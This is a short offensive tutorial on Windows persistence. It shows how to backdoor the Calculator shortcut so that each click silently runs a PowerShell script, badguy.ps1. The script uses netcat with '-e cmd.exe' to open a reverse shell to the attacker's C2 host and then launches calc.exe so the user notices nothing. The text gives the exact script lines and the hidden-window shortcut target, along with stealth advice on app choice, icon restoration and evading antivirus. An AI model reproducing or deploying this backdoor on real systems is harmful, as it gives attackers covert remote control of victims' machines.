Windows Persistence: Setting Back Door Application

Every app on your Windows system points to an executable file that is responsible for running the application. You can see which file an app points to by right-clicking on it, -> properties -> shortcuts. The name of the app executable is under target key. If our permissions are right we can change target to point to a reverse shell, bind the opening port, PowerShell script or whatever clever backdoor we can think of. Every time a user clicks the application icon the backdoor will be triggered.

We'll want to choose an app that users interact with a lot, but there is a trade-off between stealth and the likelihood that a user will click our backdoor. If we choose something that's used too frequently we'll make a lot of noise and a good analyst will know to check the path to which the executable points. Do we want to make a connection to our C2 every time someone wants to use Edge to Google something? Probably not.

The Calculator app however is a better candidate than Edge or Outlook for a backdoor. It is used just enough by normal users but not too frequently to spawn a reverse shell every 15 minutes. It is important when modifying the targtet shortcut to be sure that whatever backdoor script we're using triggers the original app. Stealth is the most important, our backdoor can't have the service crash or else the user will call the tech support team. Even if they don't discover our backdoor they could wipe it out by re-installing the app or fixing the shortcut.

Most apps run out of the C:\Windows\System32\ folder, this is pretty much equivalent to /bin on Linux systems. We'll store our backdoor PowerShell script badguy.ps1 there:

Start-Process -NoNewWindow "c:\tools\nc64.exe" "-e cmd.exe MY_IP MY_PORT"

C:\Windows\System32\calc.exe

The script is relatively simple, in the first line we trigger Netcat to connect to our C2 at a port of our choosing with a command.exe shell. We'll have to open up a listener of some sort on our front-line C2 servers. We don't necessarily have to use Netcat, we could create a Meterpreter or whatever and trigger that but that might raise some anti-virus alerts. Using NetCat or other tools on the system allows us to live off the land. In the next line, we spawn the calculator to avoid arousing any suspicion. Highly effective, and very simple.

When modifying our script to trigger the backdoor we'll need to make sure that running NetCat doesn't open any new windows, so we'll use the -WindowStyle hidden option. We can open up the properties of our calculator app and change our target to look something like this:

powershell.exe -WindowStyle hidden C:\Windows\System32\badguy.ps1

When we modify the target the app icon will change, but we can revert it to the normal icon by simply clicking on the Change Icon button and select the default icon. Voila!